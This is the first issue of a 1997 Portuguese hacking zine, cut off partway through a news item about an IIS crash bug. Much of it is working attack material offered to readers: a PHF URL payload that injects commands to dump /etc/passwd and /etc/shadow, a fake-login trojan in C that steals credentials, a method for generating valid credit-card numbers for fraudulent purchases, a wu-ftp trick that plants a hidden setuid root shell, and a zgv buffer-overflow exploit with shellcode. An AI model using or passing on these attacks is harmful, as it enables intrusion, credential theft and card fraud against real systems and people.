____________________________________________________________ .pt zine - número 0 7 de Julho de 1997 ******************************************************************************** ******************************************************************************** Indice: - Disclamer - Introdução - Qual é o objectivo desta zine? - Secções da .pt zine - Hacking... O que é?? - PHF Web Hacking - Cavalos de Tróia - Criar a função getpwent(char *nome_fich) - Algoritmo para gerar números de cartões de crédito válidos - Gzip pseudo-bug - Exploits: - wu-ftp.c - zgv.c - Noticias - Correio - Conclusão - Agradecimentos ******************************************************************************** Disclamer: ---------- É bom um gajo dizer sempre estas cenas: A informação contida nesta zine pode ser considerada de ilegal, por isso, não nos responsabilizamos com o que faças com ela! A responsabilidade é toda tua. Todo o material contido aqui deve ser exclusivamente usada para fins educacionais... Se utilizares a informação contida nesta zine para actividades ilegais ficas desde já avisado que nós não nos responsabilizamos pelo o que te possa acontecer. Pronto, resumindo o que a gente está a tentar-te explicar é que se fizeres asneiras não ponhas as culpas em nós... se a bofia te aparecer em casa, não digas que a culpa é nossa. ******************************************************************************** Introdução ---------- by Elektro Pois é,... ao fim de bastante tempo, um sonho nasceu! Criar a primeira zine portuguesa. Uma zine feita por portugueses para portugueses... Primeiro de tudo temos de dizer, que se você é daqueles leitores que está a ler esta zine para ver se tem algum artigo, que explique detalhadamente e com uma linguagem simplória, como hackar um server..., mais vale desligar o computador, pois irá apanhar uma desilusão!! Podíamos fazer isso, mas a intenção não será essa. Pretendemos que esta zine seja um impulso, para o gosto pela auto-aprendizagem. Os objectivos desta zine, são basicamente os de: -Introduzir o português no hacking. -Divulgar noticias, na área do hacking, e na generalidade informática. -Tentar resolver questões, a pedido, ou sugestão dos leitores. -Abordar assuntos, como programação, e diferentes linguagens. -Abordar directamente assuntos relacionados com o hacking. -etc... Queríamos também aproveitar para dizer, que estamos muito desiludidos, com a fraca participação, em termos de colaboradores... a principio, muita gente parecia interessada, e bastante até..., mas a passagem à pratica, foi muito diferente do que estávamos a espera!! Portanto se você ao ler estes artigos, os achar "foleiros", ou pensar que fazia melhor... pense antes, que isto foi o trabalho de três ou quatro pessoas, que resolveram embarcar neste projecto, apenas pelo amor a "arte", sem segundas intenções, e sem praticamente nenhuma ajuda. Fica então aqui mais um apelo,... agradecíamos toda e qualquer tipo de colaboração,...escrevam artigos (não se preocupem que o pessoal os achem uns lamers, pois o que para uns e básico, para outros pode ser um quebra-cabecas, e vice-versa,... pois cada um aprende a seu ritmo e a sua maneira!!), dêem dicas, ponham dúvidas, respondam ás questões,...pois nós teremos o maior prazer de as divulgar... e assim nascer uma grande zine! (Fica então aqui o agradecimento as pessoas, poucas, que responderam ao nosso desafio). Em relação a periocidade, iremos tentar ser o mais pontuáveis possível,... e apenas o sucesso das primeiras edições, ira ditar a periocidade... Se por vezes ao lerem os artigos, tiverem uma sensação de deja-vu, não se admirem, pois todos acordamos que artigos, que considerássemos de grande qualidade em zines estrangeiras, seriam "tratados", (e não copiados),para aqui. A estrutura da .pt zine, assentará na divisão em secções: Cada secção terá um tema, tais como, programação, redes, novidades, curiosidades, correio dos leitores, etc. Iremos também fornecer software, exploits etc... Espero que achem esta iniciativa útil ,e mais uma vez apelo a colaboração. Kaotik Team ******************************************************************************** Qual é o objectivo desta zine? ------------------------------ by secretos O objectivo desta zine é mostrar que em Portugal também existem bons hackers. Tentaremos que esta zine sirva para ensinar os mais novos e que seja um ponto de discussão activo para os hackers mais velhos Portugueses. Pretendemos que esta zine seja para o "newbie" e para o "oldie", e por isso iremos ter artigos sobre assuntos muito básicos e outros artigos mais "hard". Esta é a primeira zine em português (feita em Portugal) dedicada a hacking e por isso pretendemos que esta zine seja um símbolo dos hackers lusos. Com esta zine pretendemos introduzir o português no hacking; divulgar noticias na área do hacking e na generalidade informática; tentar resolver questões, a pedido, ou sugestões dos leitores; abordar assuntos como programação e diferentes linguagens; abordar directamente assuntos relacionados com o hacking. Tentaremos ser o mais interactivos possíveis e prometemos que todos vós serão ouvidos e respondidos com a maior prontidão possível. ******************************************************************************** Secções da .pt zine ---------------------- by secretos Ao longo da duração da .pt zine vamos tentar manter estas secções e esta estrutura: - Disclamer ( o texto do costume...) - Introdução (aonde escreveremos o que nos vier à cabeça!); - Stuff (iremos ter vários artigos sobre hacking, programação e informática em geral); - Exploits (aqui iremos publicar pelo menos dois exploits); - Noticias (as noticias.. nada mais a dizer); - Correio (aqui publicaremos os mails que nos forem enviados e tentaremos dar respostas às perguntas ou então pediremos que nos enviam as respostas); - Conclusão (o que poderão esperar no próximo número, e outras cenas quaisquer); - Agradecimentos (o nome e contacto de todas as pessoas que estiveram envolvidos corrente número na zine). ******************************************************************************** Hacking... O que é?? -------------------- by secretos Existe muita gente que pensa que hackers, crackers, phreakers e piratas (warez traders) é tudo a mesma coisa! Mas na verdade existe uma grande diferença entre eles. Um hacker é uma pessoa que adora informática e que gosta de explorar/conhecer tudo sobre computadores, redes, etc... Um hacker não anda a trocar ou vender software ilegal, a isso se chama piratas ou warez traders. Um hacker não destrói o sistema que hackou, a isso se chama cracker. Um hacker explorar, tenta descobrir tudo sobre um dado sistema. O objectivo do hacker é o conhecimento. A alegria do hacker é entrar num server sem a ajuda de ninguém, sabendo que foi mais inteligente que o admin do sistema... Andam por ai algumas pessoas que auto se proclamam hackers, mas na verdade não o são! Não basta ler a Phrack para se ser hacker; não basta estar montes de tempo no #hackers; não basta escrever assim: !o k E' K tU Kerez???"; não basta ouvir Prodigy. Para seres um hacker tens que hackar!!! Tens que meter a mãos à obra e andar de server em server, investigar, explorar, aprender. Os hackers acham que toda a informação devia ser livre. Existem duas maneiras de acabar com os hackers: - destruir todos os computadores e instalações telefónicas (eheehhe... esta não me parece muito viável); - disponibilizar toda a informação de graça e sem censura. Um verdadeiro hacker é um hacker com ética, com um código de honra, estes são para mim algumas das regras que eu me sigo: - Não destruo sistemas/servers. Burrices como esta podem-me levar à prisão; - Não altero os ficheiros do sistema a não ser aqueles que servem para encobrir os meus rastos e que me dêm a oportunidade de voltar novamente ao sistema; - Se alterar alguma página Web de algum server deixo sempre os ficheiros que lá estavam, posso é mudar os nomes deles. Nunca apago nada; - Não partilho os meus projectos a quase ninguém. Só mesmo quem for muito, mas muito de confiança; - Uso sempre o meu nickname, nunca uso o meu nome verdadeiro; - Nunca falo sobre os meus projectos no telefone de casa; - Não ando por ai a nukar ou a hackar servers só porque eu acho que a pessoa responsável é um lamer de merda; - Não me gabo dos meus feitos a qualquer um; - Não me considero um hacker de elite, nem julgo q sou mais que os outros, sei que existirá sempre alguém q saberá mais do que eu; - Tenho paciência. Acho que paciência é uma grande virtude num hacker. Espero que este texto sirva para clarificar as ideias a algumas pessoas. ******************************************************************************** PHF Web Hacking ---------------- by secretos Ok, podem começar a dizer "Que lame zine!! Esta merda já o meu primo de 4 anos sabe fazer!!". Mas eu já estou farto de o pessoal novato me dizerem: "Ensina-me a hackar...", "Como saco o ficheiro das passwords", etc... Apesar do bug do phf ser antigo (salvo erro foi descoberto em Novembro de 1996), em algumas empresas e universidades, aonde não há dinheiro para investir na segurança ou simplesmente porque o admin acha que ninguém se lembraria de hackar o server deles, ainda se consegue sacar o ficheiro password ou o shadow através de um simples .../cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd . Aquilo que precisas para sacar o ficheiro passwd ou o shadow é simplesmente o teu browser!! Mais nada :)) Imagina que tens um url de um server, tipo http://www.hack.pt/, para sacar o ficheiro passwd desse server tenta escrever http://www.hack.pt/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ,ou seja, acrescentaste /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ao url. Agora deve-te aparecer alguma destas mensagens no teu browser: Error 404 /cgi-bin/phf is not found on this server ou então: WARNING You do not have permission to view /cgi-bin/phf/ on this server mas se te aparecer algo parecido com isto: /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd root:2fkbNba29uWys:0:1:Operator:/:/bin/csh www:Ggv.Ne57xdRas:502:100:World-Wide Web Account:/usr/local/WWW:/bin/bash ......... acertas-te no JACKPOT :-))) Agora basta gravar o que te aparece no ecran e tentar desincriptar as passwords usando o john ou outro bom desincriptador e uma boa wordlist. Caso ao escreveres http://"nome do server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd e te aparecer qualquer coisa parecida com isto: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync isto significa que o ficheiro está shadowed, então escreve http://"nome do server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow Através do phf também podes executar comandos tais como: http://"nome do server"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin Volto a dizer que este bug já é antigo e são poucos os servers que ainda tem o PHF script a correr . Ok, espero que tenham compreendido isto tudo, mas se não perceberam népias daquilo que eu estive a falar o melhor é dedicarem-se ao crochet!! ******************************************************************************** Cavalos de Tróia ----------------- by Elektro Aqui há uns tempos recebemos um mail, que nos perguntava, o que é um cavalo de Tróia, como funciona, se resulta... Aqui vai: Um cavalo de Tróia, é um pequeno e simples programa, que funciona tem como principal objectivo, simular o ecrã de login de um sistema. Ou seja, é um programa, que esta a correr numa conta normal, mas que possui o interface da sessão de login, que vemos, quando nos ligamos ao sistema...o objectivo é enganar o utilizador que vai utilizar a maquina a seguir a nós,(nós pomos o cavalo de Tróia a correr e o desgraçado, que vira a seguir, muito inocentemente, tentara entrar para a sua área, escrevendo o seu login e a sua password,nos campos do nosso cavalo de Tróia,...que registará tudo num ficheiro, na área onde corre o programa!!:))) São geralmente, programas simples, pequenos, que não requerem muitos conhecimentos de programação, e os erros são faceis de detectar!! No mínimo pode-se dizer que são programas "divertidos", pois estar a observar a nossa obra a actuar, é demais!:)) Existem porem, alguns pontos a ter em consideração, ao fazer um cavalo de Tróia: proteger o programa dos sinais, tais como o Ctrl-c, ou Ctrl-z, que são os mais conhecidos,...e arranjar maneira de no final, o programa feche a área onde esta a correr (obvio, para quem não quer ser apanhado), e aqui é que complica mais um bocado, mas existe uma maneira, que na minha opinião e a mais segura: será a de fazer um kill ao processo pai, do nosso programa!!!Na practica isto e, fazer um kill a shell, logo uma VERDADEIRA sessão de login iniciara! No entanto, no meio de isto tudo, o cavalo de Tróia, "apanhou" o login e a password a um pobre infeliz (teoricamente)! Para exemplificar, fiz um "esboço" de um cavala de Tróia, com os pontos mais básicos, e mais essenciais: (continua..) -----------------------------CORTE POR AQUI------------------------------------ #include #include #include #include #define ERRO "Login incorrect" char *getpass(); char login[14], *password; int PPID; FILE *fich_output; void main(int argc, char *argv[]){ signal(SIGINT, SIG_IGN); /* protege o programa dos sinais signal(SIGTSTP, SIG_IGN); Ctrl-c e Ctrl-z */ if( argc<2 ){ printf("\nUso: %s \n", argv[0]); exit(0); } system("clear"); /* cria um ciclo enquanto o login for nulo */ while(strlen(login)==0){ printf("\n%s login: ",argv[1]); gets(login); } printf("Password: "); password=getpass(); /* desliga o echo para o stdout */ if((fich_output=fopen(".pw_log","a"))==NULL) { puts("\nErro de ficheiro\n"); exit(0); } fprintf(fich_output,"Login: %s ,password: %s\n", login, password); puts(ERRO); PPID=getppid(); /* retorna o PID da shell */ kill(PPID,9); } ----------------------------CORTE POR AQUI------------------------------------- (continuação...) como é obvio este cavalo de Tróia e para sistemas linux! É obvio também que isto é um cavalo de troia "pobrezinho", será sempre bom melhorar o aspecto gráfico do output do programa (que e fácil, e os próprios iniciantes em programacao conseguem faze-lo!). Outra coisa importante, é reparar como protegi o programa dos sinais Ctrl-c, e Ctrl-z...porque senão corríamos o risco de vermos a nossa área exposta, se a vitima e mais esperta que nós!! Uma ideia sera tentar proteger o programa para o maior numero possível de sinais!! Para no final encerrar a nossa área, para fazer um kill a shell, ou ao processo pai, usei a função getppid, para obter o Parent Process Id, e no final enviei o sinal 9, que e o kill,... e quando o programa termina, em vez de retornar a shell, como esta "morreu", corre uma verdadeira sessão de login. Para aumentar a segurança, o ficheiro para onde são registados os resultados do cavalo de Tróia e um ficheiro oculto (.pw_log)...outras precauções, poderão ser tomadas, se por exemplo ao compilar o programa lhe der o atributo de ocul- to...(para quem não sabe, isto consegue-se se o primeiro caracter do nome do ficheiro for '.'! O ciclo criado enquanto o login for nulo, prevê que a vitima faça qualquer coisa como fazer return em "branco"... Para acabar,...resta dizer que para "receber" a password, usei a função getpass, declarada no header pwd.h,...esta função redirecciona o output. Podia-se ter usado a funcao stty do sistema...façam, quem estiver em Linux, man stty. Mais uma vez friso, que estes programas devem-se aproximar o máximo da realidade de cada maquina...ao correr este programa o 2 argumento deve ser o nome da maquina host, na rede. ******************************************************************************** Criar a função getpwent(char *nome_fich) ----------------------------------------- by Elektro Os conhecidos crackers, são programas complicados de criar!!Requerem o uso de algoritmos muito complexos, e os erros por vezes são impossíveis de detectar!! Ao contrario do que muita gente pensa, um cracker por exemplo quando esta a "tratar" de uma password, não inverte o algoritmo de encriptação, pois isso levaria na pratica, com o maior poder de computação existente actualmente, meses! Pois o DES apanha os 7 primeiros bits de um very short (conhecidos por char) e cria uma chave de 56 bits. As probabilidades eram de 2^56...o que inviabiliza a teoria errada de alguns, que pensam que um cracker inverte o algoritmo de encriptação! O que um cracker realmente faz e, dada uma string (possível password), o programa usa o algoritmo de encriptação, sobre essa string, e compara o resultado final...dai o facto de a parte mais importante de um cracker seja a wordlist! Mas nao é isso que este artigo pretende...este artigo pretende abordar um assunto diferente: como carregar as entradas de um ficheiro passwd, usando uma função que aceite como argumento qualquer ficheiro, que não o /etc/passwd em linux, ou em dos, para memoria? Quem ja fez um cracker, sabe do que estou a falar!!!!! Para os utilizadores do Linux, que conheçam a função getpwent, sabem que esta retorna um apontador para uma estrutura.... Um ficheiro passwd tem o seguinte aspecto: username:password:UID:GID:gecos:home_dir:shell Ora quando um cracker corre, a primeira coisa que faz e carregar estas entradas para memoria! Como o faz: Usando a linguagem C: Será necessário primeiro dizer que as entradas ficam dispostas em memoria, na seguinte struct: struct passwd{ char *pw_name; char *pw_passwd; int UID; int GID; char *pw_gecos; char *pw_dir; char *pw_shell; }; E então, a função getpwent(), que poe as entradas das linhas do ficheiro nesta estrutura! Porem a função getpwent(), declarada em pwd.h, nao aceita argumentos, limitando o uso desta função ao computador host,e em DOS esta função não existe. Logo foi necessário criar uma função getpwent, que aceita-se como argumento, uma string com o nome do ficheiro "alvo". A função continuará a retornar um apontador para a struct. Ora isto pode não ser fácil, mas não e nada de outro mundo, basta reconstruir a função: (para usufruir da porção de código que se segue faça um 'cut and paste', para o ficheiro onde esta a desenvolver o cracker.) ----------------------------------CORTE AQUI--------------------------------- #include #include struct passwd *getpwent2(char *nome) { static FILE *fich = NULL; static struct passwd p; char linha[200]; int i; if(fich == NULL) if((fich = fopen(nome,"r")) == NULL){ printf("O ficheiro nao exite!"); return(NULL); } for(;;){ if(fgets(linha,200,fich)==NULL){ fclose(fich); fich = NULL; return(NULL); } i = strlen(s)-1; s[i] = '\0'; if(i == 0) continue; p.pw_name[0] = '\0'; p.pw_passwd[0] = '\0'; p.pw_gecos[0] = '\0'; p.pw_dir[0] = '\0'; p.pw_shell[0] = '\0'; strncat(p.pw_name,strtok(s,":"),9); strncat(p.pw_passwd,strtok(NULL,":"),13); sscanf(strtok(NULL,":"),"%d",&p.pw_uid); sscanf(strtok(NULL,":"),"%d",&p.pw_gid); strncat(p.pw_gecos,strtok(NULL,":"),39); strncat(p.pw_dir,strtok(NULL,":"),39); strncat(p.pw_shell,strtok(NULL,":"),20); return &p; } } -------------------------------CORTE AQUI------------------------------------ Então como pudemos ver a função getpwent2, aceita como argumento, o vector onde se encontra o nome do ficheiro a abrir, e continua a retornar um apontador para a estrutura... está então ultrapassado o problema do carregamento das entradas do ficheiro passwd para a memoria. Poder-se-ia também criar uma função que copiasse as entradas directamente, para memoria pre-reservada, mas não seria tão eficiente. Para ficar a saber mais sobre esta função, e sobre a struct passwd: faça em Linux, man getpwent. ******************************************************************************** Algoritmo para gerar números de cartões de crédito válidos ----------------------------------------------------------------------- by Elektro Com certeza, toda a gente já ouviu falar nos geradores de números de cartões de crédito!!!Porem muita asneira é dita, acerca deste assunto. 1) Quando se efectua uma transacção na web, o site "vitima", não verifica, imediatamente, se o cartão tem crédito associado.(alem de que este tipo de informação e confidencial e apenas, instituições bancárias, teem acesso a este tipo de informação). 2)Um cartão pode ser válido, ou seja, o número ter sido gerado pelo algoritmo correcto, e num entanto, não estar atribuído, ou seja nenhuma entidade bancária, ou financeira o tenha atribuído a um utilizador. 3)O facto de um cartão não estar atribuído, ao contrário do que se diz, não inviabiliza uma compra...devido ao ponto 1). 4)Se um gerador, por ventura, gerar um numero atribuído... É PURA COINCIDÊNCIA!!! O sucesso, deste tipo, de falcatrua, é relativo...eu, pessoalmente, nunca tentaria comprar um Rolex, deste modo...porem,...quem resiste a dar uma espreitadela, no bem guardado e bem pago site da Playboy! Claro, que recomendo, ao que pensam em se aventurarem nestes domínios, a darem uma saltada em www.anonymizer.com . Ao que interessa: Um número válido de um Cartão de Crédito (CC), tem 16 algarismos, dos quais os quatro primeiros (chamado prefixo), indicam o código do banco emissor, e o primeiro destes quatro algarismos, indica a rede, onde este cartão é aceite: (um mesmo banco , pode ter mais do que um prefixo, por exemplo, o Totta Matic, é um serviço especial do Banco Totta e Açores, tem um prefixo (4775), diferente dos cartões usuais!). 3 -> American Express 4 -> Visa (a mais usada em Portugal) 5 -> MasterCard 6 -> Discover (esta rede não e usada em Portugal) Como se verifica então que um número é válido?: Por exemplo o cartão... 4938 0723 5791 0411 (rede: Visa ,Banco Pinto & Sotto Mayor). Se pegarmos nos algarismos que ocupam as posições impares no número do CC: 4 3 0 2 5 9 0 1 e apenas nestes, que ocupam posições impares. Agora a esses algarismos multiplica-se 2, se o resultado for maior que 9, dever-se-a subtrair nove a multiplicação...ficara então algo como: 8 6 0 4 1 9 0 2 ..isto então passará, juntando outra vez os algarismos que ocupam as posições pares, para: 8968 0743 1791 0421 agora se a soma de todos os algarismos deste novo número for um múltiplo de 10 e menor do que 150, o número inicial é válido... ex: 8+9+6+8+0+7+4+3+1+7+9+1+0+4+2+1=70, que por sua vez e um múltiplo de 10 e é menor do que 150!! Junto incluo o código de um pequeno programa, que testa a validade de um dado número de um CC (para melhor compreenderam o algoritmo): (continua) -----------------------------------CORTE AQUI---------------------------------- #include #include #define TRUE 0 #define FALSE 1 typedef int boolean; boolean verifica(char *numero); char numero[18]; void main(){ printf("Insira o numero: "); gets(numero); if(strlen(numero)!=16){ puts("Numero incorrecto de digitos"); exit(0); } if(verifica(numero)==TRUE) puts("Valido"); else puts("Falso"); } boolean verifica(char *numero){ int c, soma=0, size; char matriz[16][3]; size=(strlen(numero)-1); /* converte um vector de caracteres, num vector de inteiros */ for(c=0; c<=size; c++){ matriz[c][0]=numero[c]; numero[c]=atoi(&matriz[c][0]); } for(c=0; c<=size; c=c+2){ numero[c]=(numero[c]*2); if(numero[c]>9) numero[c]=(numero[c]-9); } for(c=0; c<=15; c++) soma= soma+numero[c]; if( (soma<150) && (soma%10)==0 ) return(TRUE); return(FALSE); } /* ao introduzir o numero devera ignorar os espacos:a funcao destes e apenas a de facilitar a leitura do numero, apenas. */ ------------------------------CORTE POR AQUI----------------------------------- (continuação) Mas, o que nos interessa, e saber como gerar números validos de CC's...para isso e preciso saber muitos bem o algoritmo que testa a sua validade. Para gerar um número, basta apenas escolher o prefixo do banco (independentemente, se e Visa, ou qualquer outra rede): 4938 .... .... .... Sabemos então o prefixo, e queremos criar o resto...pois bem, é fácil: Geram-se aleatoriamente, mais 11 algarismos (E NÃO 12!!), e ficamos, por exemplo com o seguinte: 4938 1432 6745 362. Ou seja, o último algarismo permanece, por agora desconhecido... Tal como na função para testar, o processo e semelhante: nos algarismos que ocupam posições impares, multiplicam-se por 2, e os que com esta multiplicação ficarem maiores do que 9, subtrai-se 9 ao resultado, o resultado e este: 8 6 2 6 3 8 6 4. que juntando com os restantes algarismos: 8968 2462 3785 664. A soma total dos algarismos é: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84 Ora, para este numero ser valido, basta que o ultimo algarismo, que ainda não está atribuído seja 6, pois: 8+9+6+8+2+4+6+2+3+7+8+5+6+6+4=84+6=90 !!!! 90 e menor do que 150 e é múltiplo de 10. Ora cá temos um número gerado, válido!!!!!!!!!!!!!!!!! Para extrapolar números, a partir de porções de outros números, o processo e exactamente o mesmo. Por exemplo, queremos extrapolar números a partir da seguinte porção de um outro número: 4938 452. .... .... Geram-se aleatoriamente os restantes números, excepto o ultimo, e pratica-se a já conhecida regra!!!!!!!! Como podem ver, fazer um gerador de números de CC's e simples, apenas requer prática de algoritmia. Já agora ficam aqui também alguns prefixos de bancos portugueses, não inclui bancos estrangeiros, pois qualquer gerador, possui uma lista destes!!! 4775 - Banco Totta & Acores (TottaMatic) 4943 - Banco Mello 4552 - Banco Comercio e Industria 5901 - Banco Atlantico 4154 - Nova Rede 4547 - Banco Fonsecas e Burnay 5906 - Banco Borges Irmao 5016 - Banco Nacional Ultramarino 4407 - Banco Espirito Santo 4938 - Banco Pinto & Sotto Mayor 4552 - Banco Internacional de Credito 4644 - Caixa Geral de Depositos ******************************************************************************** Gzip pseudo-bug ---------------- Aqui há uns tempos, já nem me lembro onde, desencantei um texto, que a principio nem dei muita importância, mas que afinal revelou-se ser muito interessante!! Decidimos não o traduzir, para que nada se perdesse com uma fraca tradução! Ei-lo: "I found a bug in gzip that can allow a file that is being compressed or uncompressed to be read by anyone with search access to the directory it is in. Before unlink()ing the original file (when compressing or uncompressing), it is chmod()ed to 0777. It looks like someone didn't understand the behavior of unlink(2) vs rm(1). The problem code is in gzip.c, in copy_stat(), on line 1636: (void) chmod(ifname, 0777); if (unlink(ifname)) { There is also a similar bug when overwriting an existing file, in check_ofname(), on line 1576: (void) chmod(ofname, 0777); if (unlink(ofname)) { In both cases, the chmod() is not necessary, and only introduces a security hole. The solution is trivial - remove the chmod()s. gzip will not normally touch a file with a link count greater than 1. With -f it will. If you know that a file you want to read will be gzip -f'd, that makes this easy - make a hard link to it, and wait for your link to be the only copy, mode 777. Without -f, there are two race conditions, an easier one if you can make a hard link to the file, and a hard one if you can not. There's also a possibility for a minor denial-of-service attack, not caused by this bug. For the denial-of-service attack, make a hard link to a file you know will be gzipped either automatically or by a person who won't understand what the "gzip: foo has 1 other link -- unchanged" message means. This is also what happens if you make the link too early for the 'easy' race. This is not really a gzip issue, however, but does serve as yet another example of why there should be some way to restrict a user from adding links to a file he does not own. For the hard race, open() the file in between the chmod() and the unlink(). This is possible, but difficult. For the easier race, make a hard link to the file in between the lstat() (which is before the open(), so you have the entire time it takes to compress the file) and the unlink(). The problem with this race is that if you lose, you lose for good. You get one chance, if you do it too soon, gzip complains, if you do it too late, the file is gone. This isn't really a serious bug, but it does show that software should always be written with race conditions in mind, and that even local non-suid utilities must be written with security in mind." Esperamos que este texto tenha sido útil, para vocês, ou no mínimo, o achassem interessante ******************************************************************************** Exploits --------- ---8<-------wu-ftp.c.---------8<--- /**************************************************************************** * * * Com certeza já conhecem o velhinho wu-ftp, mas continuo a achar que é * * eficaz, e que se bem "tratado" pode substituir os RootKits: * * * * 1º COMPILA-SE, NUMA SESSÃO DE TELNET O SEGUINTE CÓDIGO: * * (obviamente que é necessário possuir uma conta válida no sistema) * * * ***************************************************************************/ main(){ setuid(0); seteuid(0); system("cp /bin/sh /tmp/.suidroot"); system("chmod a+rwxs /tmp/.suidroot"); } /*************************************************************************** * * * Para quem não imagina como fazer isto, :-|, MANDA POR FTP este ficheiro * * * * Agora cria-se um shell script, chamado root.sh, com o seguinte: * * * * exec a.out * * (em que a.out e o código do wu-ftp compilado) * * * * Agora ligado remotamente por ftp, na conta que estamos a utilizar: * * ftp> quote site exec sh root.sh * * * * De seguida saimos do ftp, e corremos na sessão de telnet /tmp/.suidroot * * * * Veremos na prompt o símbolo '$', passar a '#'. :))))))))))))) * * * * Sempre que quisermos ser root, basta executar /tmp/.suidroot !!! * * * * Como /tmp/.suidroot e um ficheiro oculto...a coisa aguenta-se.:) * * * ***************************************************************************/ ---8<----------------8<--- ---8<-------zgv.c---------8<--- /* * * zgv exploit coded by BeastMaster V on June 20, 1997 * * USAGE: * For some strage reason, the filename length of this * particular exploit must me one character long, otherwise you * will be drop into a normal unpriviledged shell. Go Figure.... * * $ cp zgv_exploit.c n.c * $ cc -o n n.c * $ ./n * Oak driver: Unknown chipset (id = 0) * bash# * * EXPLANATION: zgv (suid root) does not check bounds for $HOME env. * TEMPORARY FIX: chmod u-s /usr/bin/zgv * NOTE: Don't forget to visit http://www.rootshell.com for more exploits. * DISCLAIMER: Please use this in a responsible manner. * */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 4096 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() -4675; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("HOME", buffer, 1); execl("/usr/bin/zgv", "/usr/bin/zgv", NULL); } ---8<----------------8<--- ******************************************************************************** Noticias --------- compilado por secretos >> 3 de Junho de 1997<< IN: RECORTES - 03/Julho/1997 HACKER OU FALHA DE HARDWARE MANDA A TELEPAC ABAIXO DURANTE 3 DIAS? Durante quase 3 dias, o serviço de email do maior ISP Português esteve inoperacional devido a um "presumível ataque de spamming" - tal como aparece no site do operador. Assumi-nos que a Telepac se estará a referir a mail-bombing, ou seja, envio continuado de largos volumes de email até conseguir "entupir" o server de mail. Mas só isso não explica que o sistema estivesse em baixo o tempo todo para reposição de mais 20GB de informação, mesmo tendo em conta que o equipamento é "considerado completamente redundante [...] a nível de discos, fonte de alimentação e controladores". Daí que a afirmação oficial da firma nos levante algumas suspeitas: ou algo de muito grave aconteceu no hardware e os backups não estavam 100% operacionais ou algum hacker conseguiu penetrar no sistema e fazer estragos de grande monta. Este acontecimento quase deixou passar despercebido o facto da Telepac ter instituído o número nacional único para acesso à Internet permitindo sempre pagar chamada local em qualquer ponto do País. -------------------- >>21 de Junho de 1997<< IN: BUGTRAQ 21 Jun 1997 12:02:51 -0500 From: Aleph One Subject: http://www.eden.com/~tfast/jihad.html To: BUGTRAQ@NETSPACE.ORG CyberJihad The Microsoft IIS Bug My chronicle of finding a most embarrassing bug by Todd Fast ________________________________________________________ The Story My name is Todd Fast, and I found a bug today. I found it while trying to determine the maximum length of a URL Microsoft's Internet Information Server (IIS) would accept without an error. This website is dedicated to this bug and my chronicle of it. In case you haven't heard the details, there's a bug in Microsoft's Internet Information Server on Windows NT (and possibly other platforms) that allows a remote user--any user--to shut down the web server, and consequently the web site, using nothing more than a web browser. This is a hugely embarrassing bug for Microsoft in my opinion, particularly since they've just been lauded for pulling ahead of Netscape in Web server market. Knowing that anyone with a grudge and a twitchy keyboard could shut down any of their customer's web sites must bear horribly on their collective conscience. (Ask yourself, was that sarcasm?) The Bug I know you can't wait to know more, so here are the nitty-gritty details on the actual bug, from the original message I sent to InfoWorld: I've found a severe bug that allows any remote user on the Internet to halt web services on an Microsoft NT 4.0 server running Microsoft's Internet Information Server version 3. This bug appears to unaffected by the installation of Service Pack 3. Let me explain the details of the bug and how I came across it. The bug surfaces when a remote user requests a Web URL from the IIS server that contains a certain number of characters (I'll call this number the "bug threshold") and is of the following form: http:///?something=XXXXXXXX... To cause the fatal error, this URL should contain a CGI name/value pair of a certain length. Note that the user does not have to request any specific document: the error occurs because of the length of the URL alone. Apparently, this bug only appears when using Netscape Navigator to contact the server because Internet Explorer won't allow such a long URL to be sent. The length of the URL required to cause a crash is specific to each server, but seems to hover around 8K. Finding the correct length to kill an IIS server requires trial and error. I've found that URLs above the bug threshold return a "404 Object Not Found" or similar error. Below the threshold, the requested page loads properly. However, sending a URL who's length is exactly the bug threshold causes the server to stop responding. When a user sends this URL to an IIS web server, it causes an access violation in the INETINFO.EXE process. We don't know what this small 8k process's role is in the server's operation, but when it fails, it causes the WWW service under IIS to stop. The site administrator must then clear the error and restart the service to continue operation. The bug does not always appear upon the first document request, but repeated application will eventually cause INETINFO.EXE to fail. A colleague, Bill Chaison, has studied the Dr. Watson log file and offers more information on the location of the error in the INETINFO.EXE process: "This particular GPF occurred at 0x77A07614 on our server. The offending application is INETINFO.EXE, one of IIS 3.0's components. The stamp properties of our EXE are DATE=08/09/96, TIME=01:30a, SIZE=7440 bytes. Referencing the dump, thread ID 0xF9 performed a string compare function which caused a read fault during an iteration of the CMPSB (compare string byte by byte) opcode. This opcode works off of ESI and EDI as its base pointers and ECX as its loop repeater. I suspect that either ECX was either miscalculated to begin with, or ESI or EDI went out of range and caused a protection exception. The Watson error dialog reflected 0x77A07614 as the CS:EIP of the fault when the message box popped up. The log file below confirms the address of the error. Search the file for "FAULT ->" to jump to its description." See the attached file IISCRASH.TXT file for the stack dump. I discovered the bug while trying to determine the maximum length of the URL IIS would accept. While doing so, I found that our in-house server stopped responding. Not realizing that this was a bug that affected all copies of IIS, I continued my investigation using Microsoft's site, www.microsoft.com, and inadvertently shut down their web server as well. At this point I realized that the error was indeed a bug that affected IIS itself. To my knowledge, this bug has never been exploited or been used to crash or deny service from any web site. However, just because I 